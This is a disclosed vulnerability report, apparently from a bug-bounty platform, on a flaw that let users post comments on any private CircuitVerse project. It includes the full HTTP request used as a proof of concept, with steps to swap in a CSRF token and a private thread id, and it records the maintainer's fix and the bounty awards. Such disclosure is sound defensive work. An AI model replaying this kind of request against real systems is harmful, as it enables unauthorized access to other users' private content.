Execution with Unnecessary Privileges in circuitverse/circuitverse

Valid

Reported on

Aug 24th 2021


✍️ Description

Privilege escalation bug to add comment to any private project

🕵️‍♂️ Proof of Concept

Bellow request is vulnerable to privilege escalation bug

POST /commontator/threads/496401/comments HTTP/2
Host: circuitverse.org
Cookie: ..
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://circuitverse.org/users/90744/projects/proje1-20dc2034-2a88-4010-9464-d99fdd64ee71
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
X-Csrf-Token: RRTQRCgazoe4GIRYJIVF7+y6wmmIWfJ+Qm+sYTRGOalo8iIdollO95R1/0O15kLJ2ysN0yyMj0BpVrvX1F7SIQ==
Origin: https://circuitverse.org
Content-Length: 70
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

comment%5Bparent_id%5D=&comment%5Bbody%5D=xeeecx&commit=Post%20Comment

Here in this request change X-Csrf-Token value to your own token value and also change thread-id to any private project id and forward the request .
Now a new comment will be added to a private project .

💥 Impact

privilege escalation bug to add comment to any private thread

We have contacted a member of the circuitverse team and are waiting to hear back 3 months ago
We have contacted a member of the circuitverse team and are waiting to hear back 3 months ago
Aboobacker MK validated this vulnerability 3 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Aboobacker MK
3 months ago

We have deployed a basic fix for this, Can you please help us in validating the fix ?

ranjit-git
3 months ago

Researcher


@maintainer I just confirmed that fix is working properly .
Now i getting 403 Forbidden during commenting in private project .
Good job
Can you plz also validate the other 2 report ?

Aboobacker MK confirmed that a fix has been merged on 13d4cc 3 months ago
Aboobacker MK has been awarded the fix bounty